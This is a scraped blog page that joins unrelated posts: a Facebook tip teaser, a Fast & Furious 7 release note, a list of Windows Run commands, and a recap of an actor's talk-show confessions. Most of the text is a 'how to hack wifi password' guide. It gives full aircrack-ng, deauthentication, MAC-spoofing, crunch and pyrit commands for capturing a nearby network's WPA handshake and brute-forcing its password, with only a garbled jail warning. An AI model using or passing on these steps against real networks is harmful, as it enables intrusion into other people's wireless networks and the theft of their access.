fasfasf
fgsdfsd
How to Make Sure Facebook Doesn't Filter Out Page and Friend Updates Facebook doesn't automatically show you all the content...
How to Make Sure Facebook Doesn't Filter Out Page and Friend Updates
How to Make Sure Facebook Doesn't Filter Out Page and Friend Updates
WARNING: Don't Hack any authorized router,otherwise you'll be put into jail. certain things to be followed..such as creati...
how to hack wifi password
WARNING:Don't Hack any authorized router,otherwise you'll be put into jail.
certain things to be followed..such as creating virtual machine!!!running in your OS if you have windows..!!
- Download VMware Workstation here: http://www.softpedia.com/get/System/OS-Enhancements/VMware-Workstation.shtml
- Create a new virtual machine like i have created...!!!
- press enter......go on
- At BOOT Menu....just type startx
- an Now your all set to go...just simply follow below steps...now
Rules to Follow
- A Backtrack Live CD: the Linux Live CD that lets you do all sorts of security testing and tasks. Download yourself a copy of the CD and burn it, or load it up in VMware to get started.
- here a link to download it http://www.backtrack-linux.org/downloads
- I highly recommend you to download backtrck 32 bit version coz it runs smoothly...in win7 64bit through vmware workstation.......... /
- A nearby WEP-enabled Wi-Fi network
- Patience with the command line. This is an ten-step process that requires typing in long, arcane commands and waiting around for your Wi-Fi card to collect data in order to crack the password. Like the doctor said to the short person, be a little patient.
airmon-ng
The result will be something like :
Interface Chipset Driver
wlan0 Intel 5100 iwlagn - [phy0]
Step 2 :
airmon-ng start wlan0
Step 3 (Optional) :
Change the mac address of the mon0 interface.
ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 up
Step 4 :
airodump-ng mon0
Then, press "
Ctrl+c
" to break the program.Step 5 :
airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff --ivs mon0
*where -c is the channel
-w is the file to be written
--bssid is the BSSID
This terminal is keeping running.
Step 6 :
open another terminal.
aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44 mon0
*where -a is the BSSID
-c is the client MAC address (STATION)
Wait for the handshake.
Step 7 :
Use the John the Ripper as word list to crack the WPA/WP2 password.
aircrack-ng -w /pentest/passwords/john/password.lst wpacrack-01.ivs
Step 8 (Optional) :ITS AN OPTIONAL STEP,,,,,,
If you do not want to use John the Ripper as word list, you can use Crunch.
Go to the official site of crunch.
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/
Download crunch 3.0 (the current version at the time of this writing).
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/crunch-3.0.tgz/download
tar -xvzf crunch-3.0.tgz
cd crunch-3.0
make
make install
/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | aircrack-ng wpacrack-01.ivs -b ff:ff:ff:ff:ff:ff -w -
*where
8 16
is the length of the password, i.e. from 8 characters to 16 characters.(B) nVidia Display Card with CUDA
If you have nVidia card that with CUDA, you can use pyrit to crack the password with crunch.
Step a :
airmon-ng
The result will be something like :
Interface Chipset Driver
wlan0 Intel 5100 iwlagn - [phy0]
Step b :
airmon-ng start wlan0
Step c (Optional) :
Change the mac address of the mon0 interface.
ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 up
Step d :
airodump-ng mon0
Then, press "
Ctrl+c
" to break the program.Step e :
airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff mon0
Step f :
open another terminal.
aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44 mon0
*where -a is the BSSID
-c is the client MAC address (STATION)
Wait for the handshake.
Step g :
If the following programs are not yet installed, please do it.
apt-get install libghc6-zlib-dev libssl-dev python-dev libpcap-dev python-scapy
Step h :
Go to the official site of crunch.
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/
Download
crunch 3.0
(the current version at the time of this writing).http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/crunch-3.0.tgz/download
tar -xvzf crunch-3.0.tgz
cd crunch-3.0
make
make install
Step i :
Go to the official site of pyrit.
http://code.google.com/p/pyrit/downloads/list
Download
pyrit
and cpyrit-cuda
(the current version is 0.4.0 at the time of this writing).tar -xzvf pyrit-0.4.0.tar.gz
cd pyrit-0.4.0
python setup.py build
sudo python setup.py install
tar -xzvf cpyrit-cuda-0.4.0.tar.gz
cd cpyrit-cuda-0.4.0
python setup.py build
sudo python setup.py install
Step j :
/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | pyrit --all-handshakes -r wpacrack-01.cap -b ff:ff:ff:ff:ff:ff -i - attack_passthrough
*where
8 16
is the length of the password, i.e. from 8 characters to 16 characters.Step k (Optional) :
If you encounter error when reading the
wpacrack-01.cap
, you should do the following step.pyrit -r wpacrack-01.cap -o new.cap stripLive
/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | pyrit --all-handshakes -r new.cap -b ff:ff:ff:ff:ff:ff -i - attack_passthrough
*where
8 16
is the length of the password, i.e. from 8 characters to 16 characters.Step l :
Then, you will see something similar to the following.
Pyrit 0.4.0 (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+
Parsing file 'new.cap' (1/1)...
Parsed 71 packets (71 802.11-packets), got 55 AP(s)
Tried 17960898 PMKs so far; 17504 PMKs per second.
Remarks :
If you have an nVidia GeForce GTX460 (336 CUDA cores), the speed of cracking is about 17,000 passwords per second.
To test if your wireless card (either USB or PCI-e) can do the injection or not :
airodump-ng mon0
Open another terminal.
aireplay-ng -9 mon0
pyrit list_cores
That's all! See you. THANKS YOU AND plz follow me in blog.......
Originally done by @suo_motu on Twitter. Hilarious ! XD Enjoy !
With the tragic death of Paul Walker, many wondered what would happen with the next installation in the Fast & Furious franchise. Wal...
Vin Diesel Announces Fast & Furious 7 Release Date: April 10 2015 !
With the tragic death of Paul Walker, many wondered what would happen with the next installation in the Fast & Furious franchise. Walker’s passing immediately halted the film’s production (as they should have), leaving the film and studio with the task of figuring out when Fast & Furious 7 would be released.
As a fan of the series (my ultimate guilty pleasure), I’m happy they are at least giving fans some more grieving time before the movie’s release.
Hi guys ! These are the commands you can use in the Run dialog box to open control panel applications and properties. Opening the Ru...
Run Commands to access the control panel !
Hi guys !
Opening the Run dialog box :
⌘ Win+R
Start->All Programs->Accessories->Run
Commands to access the control panel:
Add/Remove Programs : appwiz.cpl
Date/Time Properties : timedate.cpl
Display Properties : desk.cpl
FindFast : findfast.cpl
Fonts Folder : fonts
Internet Properties : inetcpl.cpl
Keyboard Properties : main.cpl keyboard
Mouse Properties : main.cpl
Multimedia Properties : mmsys.cpl
Network Properties : netcpl.cpl or ncpa.cpl
Password Properties : password.cpl
Printers Folder : printers
Sound Properties : mmsys.cpl sounds
System Properties : sysdm.cpl
" Vijay Sethupathi " who is current sensation of kollywood recently participate in a talkshow at pudhu channel , here are some...
Vijay Sethupathi Confession
* Worst Insult he had recieved in his career -
When he was ran away from shooting spot while he was about to have lunch as unnamed person sumone told him he doesn't belong here
* he never had the courage to even propose -
Vj sethupathi said he was shy always , he did not even having the courage to propose a girl , he said he is in love with a girl for 3 yearswhile min school and another 4 years in college but till date that girls wouldnt even know that he had loved him
* On his wife jessi -
He says that the same shy guy proposed on the second day to her and within a week he informed to his parents and just in 5 month he married to her
* On his fear of failure -
Vijay revealed he is indeed very afraid with all the massive attention he is currently getting hit and popularity he might all of sudden and get totally disappear
and he doesnt want to be branded an seasonal hit actor
* First Autograph he ever sign -
It was during shoot of " lee " where he acted with sibi and there were acting in football field and one boy ran upto him to get his autograph but vijay revealed that
the hero was there ( pointing Sibi )
* His First Shoot and he got rejected -
Vj Sethupathi says that first photoshopot he ever went to was kamal haasan's "Nammavar" shooting where he and his friends auditioned for a scene but he alone was rejected for being a " PALAM "
* Confession -
Vijay Sethupathi confessed he once drank his father's drink while he studying in 8th STD as he thought it would be tasty , The actor confessed his frst party with his dad when he was doing 12th standard where he dranked with his dad
Follow Us
Were this world an endless plain, and by sailing eastward we could for ever reach new distances